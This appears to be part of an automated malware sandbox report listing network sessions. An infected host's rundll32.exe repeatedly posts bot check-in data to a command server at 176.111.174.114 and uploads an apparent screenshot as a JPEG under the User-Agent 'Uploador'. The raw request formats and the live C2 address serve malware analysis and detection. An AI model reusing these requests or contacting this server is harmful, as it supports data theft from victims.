                                                                                                                                          Data Ascii: =6^WU_[trkjs|r?X|M[+(l?ruIz?HD-v3q_i_5]_H,0UEI$x<FT{ygnp=OUj"'RXiPrcmxH


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          24192.168.2.449760176.111.174.11480C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 22:59:13.224731922 CEST4533OUTPOST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          240176.111.174.11480192.168.2.449888C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 22:59:48.481601000 CEST6724INHTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 20:59:48 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          241192.168.2.449890176.111.174.11480C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 22:59:48.693478107 CEST6807OUTPOST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          242176.111.174.11480192.168.2.449890C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 22:59:48.797477007 CEST6913INHTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 20:59:48 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          243176.111.174.11480192.168.2.449889C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 22:59:48.943039894 CEST6944INHTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 20:59:48 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 0
                                                                                                                                          Keep-Alive: timeout=5, max=100
                                                                                                                                          Connection: Keep-Alive
                                                                                                                                          Content-Type: text/html; charset=UTF-8


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          244192.168.2.449891176.111.174.11480C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 22:59:49.008996010 CEST6945OUTPOST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          245176.111.174.11480192.168.2.449891C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 22:59:49.113667965 CEST6947INHTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 20:59:49 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          246192.168.2.449893176.111.174.11480C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 22:59:49.342708111 CEST6949OUTPOST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          247176.111.174.11480192.168.2.449893C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 22:59:49.455008984 CEST6950INHTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 20:59:49 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          248192.168.2.449894176.111.174.11480C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 22:59:49.676522970 CEST6952OUTPOST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          249176.111.174.11480192.168.2.449894C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 22:59:49.775759935 CEST6953INHTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 20:59:49 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          25176.111.174.11480192.168.2.449760C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 22:59:13.324136019 CEST4533INHTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 20:59:13 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          250192.168.2.449895176.111.174.11480C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 22:59:49.993475914 CEST6956OUTPOST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          251176.111.174.11480192.168.2.449895C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 22:59:50.100819111 CEST6957INHTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 20:59:50 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          252192.168.2.449896176.111.174.11480C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 22:59:50.317758083 CEST6959OUTPOST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          253176.111.174.11480192.168.2.449896C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 22:59:50.415971041 CEST6961INHTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 20:59:50 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          254192.168.2.449901176.111.174.11480C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 22:59:50.723227978 CEST6964OUTPOST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          255176.111.174.11480192.168.2.449901C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 22:59:50.825123072 CEST6977INHTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 20:59:50 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          256192.168.2.449904176.111.174.11480C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 22:59:51.050751925 CEST6978OUTPOST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          257176.111.174.11480192.168.2.449904C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 22:59:51.156960964 CEST6984INHTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 20:59:51 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          258192.168.2.449905176.111.174.11480C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 22:59:51.847280979 CEST8013OUTPOST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          259176.111.174.11480192.168.2.449905C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 22:59:51.951944113 CEST8013INHTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 20:59:51 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          26192.168.2.449761176.111.174.11480C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 22:59:13.536020041 CEST4534OUTPOST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          260192.168.2.449906176.111.174.11480C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 22:59:52.164589882 CEST8014OUTPOST /Hnq8vS/index.php HTTP/1.1
                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          Content-Length: 82
                                                                                                                                          Cache-Control: no-cache
                                                                                                                                          Data Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 31 36 26 73 64 3d 36 62 33 63 38 36 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 31 39 36 33 35 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                                                                                          Data Ascii: id=152138533219&vs=2.16&sd=6b3c86&os=1&bi=1&ar=1&pc=019635&un=user&dm=&av=13&lv=0


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          261176.111.174.11480192.168.2.449906C:\Users\user\AppData\Local\Temp\e90e419c61\blfte.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 22:59:52.264585018 CEST8014INHTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 28 Apr 2021 20:59:52 GMT
                                                                                                                                          Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16
                                                                                                                                          X-Powered-By: PHP/5.4.16
                                                                                                                                          Content-Length: 6
                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                          Data Raw: 3c 63 3e 3c 64 3e
                                                                                                                                          Data Ascii: <c><d>


                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                          262192.168.2.449907176.111.174.11480C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                          Apr 28, 2021 22:59:52.467658043 CEST8028OUTPOST //Hnq8vS/index.php?scr=up HTTP/1.1
                                                                                                                                          Host: 176.111.174.114
                                                                                                                                          User-Agent: Uploador
                                                                                                                                          Content-Type: multipart/form-data; boundary=152138533219.jpg
                                                                                                                                          Connection: Keep-Alive
                                                                                                                                          Content-Length: 227184
                                                                                                                                          Data Raw: 2d 2d 31 35 32 31 33 38 35 33 33 32 31 39 2e 6a 70 67 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 31 35 32 31 33 38 35 33 33 32 31 39 2e 6a 70 67 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 43 00 02 01 01 01 01 01 02 01 01 01 02 02 02 02 02 04 03 02 02 02 02 05 04 04 03 04 06 05 06 06 06 05 06 06 06 07 09 08 06 07 09 07 06 06 08 0b 08 09 0a 0a 0a 0a 0a 06 08 0b 0c 0b 0a 0c 09 0a 0a 0a ff db 00 43 01 02 02 02 02 02 02 05 03 03 05 0a 07 06 07 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a 0a ff c0 00 11 08 04 00 05 00 03 01 22 00 02 11 01 03 11 01 ff c4 00 1f 00 00 01 05 01 01 01 01 01 01 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 0a 0b ff c4 00 b5 10 00 02 01 03 03 02 04 03 05 05 04 04 00 00 01 7d 01 02 03 00 04 11 05 12 21 31 41 06 13 51 61 07 22 71 14 32 81 91 a1 08 23 42 b1 c1 15 52 d1 f0 24 33 62 72 82 09 0a 16 17 18 19 1a 25 26 27 28 29 2a 34 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 83 84 85 86 87 88 89 8a 92 93 94 95 96 97 98 99 9a a2 a3 a4 a5 a6 a7 a8 a9 aa b2 b3 b4 b5 b6 b7 b8 b9 ba c2 c3 c4 c5 c6 c7 c8 c9 ca d2 d3 d4 d5 d6 d7 d8 d9 da e1 e2 e3 e4 e5 e6 e7 e8 e9 ea f1 f2 f3 f4 f5 f6 f7 f8 f9 fa ff c4 00 1f 01 00 03 01 01 01 01 01 01 01 01 01 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 0a 0b ff c4 00 b5 11 00 02 01 02 04 04 03 04 07 05 04 04 00 01 02 77 00 01 02 03 11 04 05 21 31 06 12 41 51 07 61 71 13 22 32 81 08 14 42 91 a1 b1 c1 09 23 33 52 f0 15 62 72 d1 0a 16 24 34 e1 25 f1 17 18 19 1a 26 27 28 29 2a 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 82 83 84 85 86 87 88 89 8a 92 93 94 95 96 97 98 99 9a a2 a3 a4 a5 a6 a7 a8 a9 aa b2 b3 b4 b5 b6 b7 b8 b9 ba c2 c3 c4 c5 c6 c7 c8 c9 ca d2 d3 d4 d5 d6 d7 d8 d9 da e2 e3 e4 e5 e6 e7 e8 e9 ea f2 f3 f4 f5 f6 f7 f8 f9 fa ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 fc 50 8a 2f 2e 9f 52 fd 8f 77 5c d2 ec 35 fa 5c 69 9f 07 ce 47 1f 7a 75 7b 17 c1 af d8 53 f6 86 f8 d3 e1 3b 2f 89 1a 56 81 65 a2 f8 4f 50 9e 48 ad 3c 51 e2 2b f5 b7 b5 99 a3 72 92 18 91 43 4f 70 15 c1 56 30 c5 26 d2 08 38 22 bd df e1 ff 00 fc 13 93 e0 87 85 f6 5d 7c 4a f1 de b3 e2 bb c5 5c b5 9e 91 12 e9 b6 28 e0 f4 f3 1c 49 35 c4 67 d9 6d 9f e9 58 d5 c4 e1 e9 68 e5 af 91 ac 28 56 a8 ae 96 87 c5 29 f7 6a c2 7d da fd 19 bd fd 87 ff 00 63 8f 1a 78 7f ec 6f f0 5a 7f 0f c8 cd 95 d4 7c 2f e2 7b e5 b8 07 8c 03 f6 e9 2e a2 2b ea 3c b0 c7 b3 0a f2 1f 88 7f f0 49 df 12 c4 b2 5d fc 0b f8 c9 a4 eb a0 6e 31 e8 fe 27 87 fb 22 f1 cf 50 89 29 79 2d 58 01 c6 f9 26 87 24 7d d1 9e 2a 9e 3f 0f 3d f4 f5 26 b6 0e bc 76 57 f4 3e 45 a4 55 c6 45 76 df 16 7f 67 5f 8e 7f 01 ee a3 8b e2 ef c2 bd 6b 42 8a 79 0a 59 df de 59 37 d8 ef 08 19 fd c5 ca e6 19 c6 3b c6 ec 38 3c f1 5c 5b 6f ef 5d d1 94 65 0b a7 73 85 a9 45 d9 90 c7 1b d0 fd 3f 1a 96 9a f8 ee 29 72 15 cd 76 57 93 b5 44 e3 9f ad 4b 27 6a 6e dd dc 62 b1 94 4d e3 b9 4e 44 3e b5 1d 7e c7 f8 9b fe 0d 34 d5 7c 37 75 f6 7b ff 00 db 9f 74 2e d8 86 e5 3e 18 65 5f ff 00 2a 7c 1f 6f e6 39 aa d6 bf f0 6a 22 dc f5 fd bd f6 ff 00 dd 2d cf fe e5 2b f3 2a de 2b f0 05 29 b8 4f 19 66 bf e9 dd 6f fe 56 7d 64 38 4b 88 a5 1e 65 43 4f f1 43 ff 00 92 3f 1e a3 eb f8 54 be 53 fa 57 ec 8d b7 fc 1a 4e 2e 17 1f f0 f0 1d bc ff 00 d1 29 cf fe e5 6b f2 8b f6 87 f8 44 df b3 ff 00 ed 09 e3 df 80 8f af 8d 58 f8 27 c6 5a a6 80 75 51 6b e4 0b c3 67 77 2d bf 9d e5 ee 6f 